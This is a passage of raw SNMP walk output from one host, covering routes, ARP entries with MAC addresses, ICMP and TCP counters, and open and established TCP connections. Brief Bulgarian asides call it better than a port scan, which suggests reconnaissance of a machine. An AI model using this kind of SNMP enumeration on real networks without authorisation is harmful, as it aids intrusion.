ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.12.32.42.202 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.12.32.42.210 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.14.11.15.192 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.14.11.15.200 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.0.0.0.0 = IpAddress: 12.32.42.27
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.192.168.0.0 = IpAddress: 192.168.0.4
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.192.168.0.4 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.12.32.42.27 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.12.32.42.194 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.12.32.42.195 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.12.32.42.196 = IpAddress: 12.32.42.195
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.12.32.42.199 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.12.32.42.200 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.12.32.42.202 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.12.32.42.210 = IpAddress: 12.32.42.195
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.14.11.15.192 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.14.11.15.200 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteType.0.0.0.0 = INTEGER: indirect(4)
ip.ipRouteTable.ipRouteEntry.ipRouteType.192.168.0.0 = INTEGER: indirect(4)
ip.ipRouteTable.ipRouteEntry.ipRouteType.192.168.0.4 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteType.12.32.42.27 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteType.12.32.42.194 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteType.12.32.42.195 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteType.12.32.42.196 = INTEGER: indirect(4)
ip.ipRouteTable.ipRouteEntry.ipRouteType.12.32.42.199 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteType.12.32.42.200 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteType.12.32.42.202 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteType.12.32.42.210 = INTEGER: indirect(4)
ip.ipRouteTable.ipRouteEntry.ipRouteType.14.11.15.192 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteType.14.11.15.200 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.0.0.0.0 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.192.168.0.0 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.192.168.0.4 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.12.32.42.27 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.12.32.42.194 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.12.32.42.195 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.12.32.42.196 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.12.32.42.199 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.12.32.42.200 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.12.32.42.202 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.12.32.42.210 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.14.11.15.192 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.14.11.15.200 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteAge.0.0.0.0 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.192.168.0.0 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.192.168.0.4 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.12.32.42.27 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.12.32.42.194 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.12.32.42.195 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.12.32.42.196 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.12.32.42.199 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.12.32.42.200 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.12.32.42.202 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.12.32.42.210 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.14.11.15.192 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.14.11.15.200 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMask.0.0.0.0 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteMask.192.168.0.0 = IpAddress: 255.255.128.0
ip.ipRouteTable.ipRouteEntry.ipRouteMask.192.168.0.4 = IpAddress: 255.255.255.255
ip.ipRouteTable.ipRouteEntry.ipRouteMask.12.32.42.27 = IpAddress: 255.255.255.255
ip.ipRouteTable.ipRouteEntry.ipRouteMask.12.32.42.194 = IpAddress: 255.255.255.255
ip.ipRouteTable.ipRouteEntry.ipRouteMask.12.32.42.195 = IpAddress: 255.255.255.255
ip.ipRouteTable.ipRouteEntry.ipRouteMask.12.32.42.196 = IpAddress: 255.255.255.255
ip.ipRouteTable.ipRouteEntry.ipRouteMask.12.32.42.199 = IpAddress: 255.255.255.255
ip.ipRouteTable.ipRouteEntry.ipRouteMask.12.32.42.200 = IpAddress: 255.255.255.248
ip.ipRouteTable.ipRouteEntry.ipRouteMask.12.32.42.202 = IpAddress: 255.255.255.255
ip.ipRouteTable.ipRouteEntry.ipRouteMask.12.32.42.210 = IpAddress: 255.255.255.255
ip.ipRouteTable.ipRouteEntry.ipRouteMask.14.11.15.192 = IpAddress: 255.255.255.224
ip.ipRouteTable.ipRouteEntry.ipRouteMask.14.11.15.200 = IpAddress: 255.255.255.248
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.0.0.0.0 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.192.168.0.0 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.192.168.0.4 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.12.32.42.27 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.12.32.42.194 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.12.32.42.195 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.12.32.42.196 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.12.32.42.199 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.12.32.42.200 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.12.32.42.202 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.12.32.42.210 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.14.11.15.192 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.14.11.15.200 = INTEGER: -1
<[routing tablica ........ ]>
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaIfIndex.2.192.168.0.4 = INTEGER: 2
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaIfIndex.2.12.32.42.194 = INTEGER: 2
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaIfIndex.2.12.32.42.195 = INTEGER: 2
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaIfIndex.2.12.32.42.199 = INTEGER: 2
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress.2.192.168.0.4 = OCTET STRING: Hex: 00 20 AF 3C 07 F7
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress.2.12.32.42.194 = OCTET STRING: Hex: 00 20 AF 90 C9 9E
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress.2.12.32.42.195 = OCTET STRING: Hex: 00 00 21 00 0C 90
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress.2.12.32.42.199 = OCTET STRING: Hex: 00 00 21 00 0C 90
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaNetAddress.2.192.168.0.4 = IpAddress: 192.168.0.4
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaNetAddress.2.12.32.42.194 = IpAddress: 12.32.42.194
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaNetAddress.2.12.32.42.195 = IpAddress: 12.32.42.195
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaNetAddress.2.12.32.42.199 = IpAddress: 12.32.42.199
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaType.2.192.168.0.4 = INTEGER: dynamic(3)
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaType.2.12.32.42.194 = INTEGER: dynamic(3)
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaType.2.12.32.42.195 = INTEGER: dynamic(3)
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaType.2.12.32.42.199 = INTEGER: dynamic(3)
<[ ARP i t.n. ]>
icmp.icmpInMsgs.0 = Counter: 50064
icmp.icmpInErrors.0 = Counter: 112
icmp.icmpInDestUnreachs.0 = Counter: 21642
icmp.icmpInTimeExcds.0 = Counter: 100
icmp.icmpInParmProbs.0 = Counter: 0
icmp.icmpInSrcQuenchs.0 = Counter: 29
icmp.icmpInRedirects.0 = Counter: 36
icmp.icmpInEchos.0 = Counter: 19863
icmp.icmpInEchoReps.0 = Counter: 8394
icmp.icmpInTimestamps.0 = Counter: 0
icmp.icmpInTimestampReps.0 = Counter: 0
icmp.icmpInAddrMasks.0 = Counter: 0
icmp.icmpInAddrMaskReps.0 = Counter: 0
icmp.icmpOutMsgs.0 = Counter: 47095
icmp.icmpOutErrors.0 = Counter: 0
icmp.icmpOutDestUnreachs.0 = Counter: 27202
icmp.icmpOutTimeExcds.0 = Counter: 30
icmp.icmpOutParmProbs.0 = Counter: 0
icmp.icmpOutSrcQuenchs.0 = Counter: 0
icmp.icmpOutRedirects.0 = Counter: 0
icmp.icmpOutEchos.0 = Counter: 0
icmp.icmpOutEchoReps.0 = Counter: 19863
icmp.icmpOutTimestamps.0 = Counter: 0
icmp.icmpOutTimestampReps.0 = Counter: 0
icmp.icmpOutAddrMasks.0 = Counter: 0
icmp.icmpOutAddrMaskReps.0 = Counter: 0
<[ ICMP statistika ]>
tcp.tcpRtoAlgorithm.0 = INTEGER: other(1)
tcp.tcpRtoMin.0 = INTEGER: 0
tcp.tcpRtoMax.0 = INTEGER: 0
tcp.tcpMaxConn.0 = INTEGER: 0
tcp.tcpActiveOpens.0 = Counter: 27020
tcp.tcpPassiveOpens.0 = Counter: 0
tcp.tcpAttemptFails.0 = Counter: 10
tcp.tcpEstabResets.0 = Counter: 0
tcp.tcpCurrEstab.0 = Gauge: 20
tcp.tcpInSegs.0 = Counter: 1627561
tcp.tcpOutSegs.0 = Counter: 1508541
tcp.tcpRetransSegs.0 = Counter: 46807
<[ TCP statistika ]>
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.7.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.9.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.13.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.19.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.21.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.22.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.23.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.25.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.37.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.79.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.80.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.110.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.111.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.113.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.515.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.3046.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.3128.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.3333.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.4444.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.53.0.0.0.0.0 = INTEGER: listen(2)
<[ ot tova po-dobur portscan - zdrave mu kazhi ]>
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3644.127.0.0.1.3645 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3645.127.0.0.1.3644 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3646.127.0.0.1.3647 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3647.127.0.0.1.3646 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3648.127.0.0.1.3649 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3649.127.0.0.1.3648 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3650.127.0.0.1.3651 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3651.127.0.0.1.3650 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3652.127.0.0.1.3653 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3653.127.0.0.1.3652 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3654.127.0.0.1.3655 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3655.127.0.0.1.3654 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3656.127.0.0.1.3657 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3657.127.0.0.1.3656 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.22.12.32.42.194.1023 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.53.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.2747.34.42.134.6.6667 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.3128.192.168.0.25.1433 = INTEGER: timeWait(11)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.3128.192.168.0.25.1435 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.3128.192.168.0.25.1436 = INTEGER: timeWait(11)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.3128.192.168.0.25.1437 = INTEGER: timeWait(11)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.3128.12.32.42.194.1487 = INTEGER: closeWait(8)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.3128.12.32.42.210.1517 = INTEGER: timeWait(11)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.3128.12.32.42.210.1524 = INTEGER: timeWait(11)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.3333.12.32.42.199.1038 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.4205.34.42.134.6.8080 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.12.32.42.193.4446.34.42.134.6.8080 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.14.11.15.193.53.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.7.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.9.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.13.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.19.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.21.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.22.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.23.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.25.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.37.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.79.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.80.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.110.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.111.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.113.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.515.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.3046.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.3128.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.3333.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.0.0.0.0.4444.0.0.0.0.0 = IpAddress: 0.0.0.0
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.53.0.0.0.0.0 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3644.127.0.0.1.3645 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3645.127.0.0.1.3644 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3646.127.0.0.1.3647 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3647.127.0.0.1.3646 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3648.127.0.0.1.3649 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3649.127.0.0.1.3648 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3650.127.0.0.1.3651 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3651.127.0.0.1.3650 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3652.127.0.0.1.3653 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3653.127.0.0.1.3652 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3654.127.0.0.1.3655 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3655.127.0.0.1.3654 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3656.127.0.0.1.3657 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.127.0.0.1.3657.127.0.0.1.3656 = IpAddress: 127.0.0.1
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.22.12.32.42.194.1023 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.53.0.0.0.0.0 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.2747.34.42.134.6.6667 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.3128.192.168.0.25.1433 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.3128.192.168.0.25.1435 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.3128.192.168.0.25.1436 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.3128.192.168.0.25.1437 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.3128.12.32.42.194.1487 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.3128.12.32.42.210.1517 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.3128.12.32.42.210.1524 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.3333.12.32.42.199.1038 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.4205.34.42.134.6.8080 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.12.32.42.193.4446.34.42.134.6.8080 = IpAddress: 12.32.42.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalAddress.14.11.15.193.53.0.0.0.0.0 = IpAddress: 14.11.15.193
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.7.0.0.0.0.0 = INTEGER: 7
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.9.0.0.0.0.0 = INTEGER: 9
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.13.0.0.0.0.0 = INTEGER: 13
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.19.0.0.0.0.0 = INTEGER: 19
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.21.0.0.0.0.0 = INTEGER: 21
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.22.0.0.0.0.0 = INTEGER: 22
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.23.0.0.0.0.0 = INTEGER: 23
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.25.0.0.0.0.0 = INTEGER: 25
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.37.0.0.0.0.0 = INTEGER: 37
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.79.0.0.0.0.0 = INTEGER: 79
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.80.0.0.0.0.0 = INTEGER: 80
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.110.0.0.0.0.0 = INTEGER: 110
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.111.0.0.0.0.0 = INTEGER: 111
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.113.0.0.0.0.0 = INTEGER: 113
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.515.0.0.0.0.0 = INTEGER: 515
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.3046.0.0.0.0.0 = INTEGER: 3046
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.3128.0.0.0.0.0 = INTEGER: 3128
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.3333.0.0.0.0.0 = INTEGER: 3333
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.0.0.0.0.4444.0.0.0.0.0 = INTEGER: 4444
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.53.0.0.0.0.0 = INTEGER: 53
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3644.127.0.0.1.3645 = INTEGER: 3644
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3645.127.0.0.1.3644 = INTEGER: 3645
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3646.127.0.0.1.3647 = INTEGER: 3646
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3647.127.0.0.1.3646 = INTEGER: 3647
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3648.127.0.0.1.3649 = INTEGER: 3648
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3649.127.0.0.1.3648 = INTEGER: 3649
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3650.127.0.0.1.3651 = INTEGER: 3650
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3651.127.0.0.1.3650 = INTEGER: 3651
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3652.127.0.0.1.3653 = INTEGER: 3652
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3653.127.0.0.1.3652 = INTEGER: 3653
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3654.127.0.0.1.3655 = INTEGER: 3654
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3655.127.0.0.1.3654 = INTEGER: 3655
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3656.127.0.0.1.3657 = INTEGER: 3656
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.127.0.0.1.3657.127.0.0.1.3656 = INTEGER: 3657
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.22.12.32.42.194.1023 = INTEGER: 22
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.53.0.0.0.0.0 = INTEGER: 53
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.2747.34.42.134.6.6667 = INTEGER: 2747
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.3128.192.168.0.25.1433 = INTEGER: 3128
tcp.tcpConnTable.tcpConnEntry.tcpConnLocalPort.12.32.42.193.3128.192.168.0.25.1435 = INTEGER: 3128
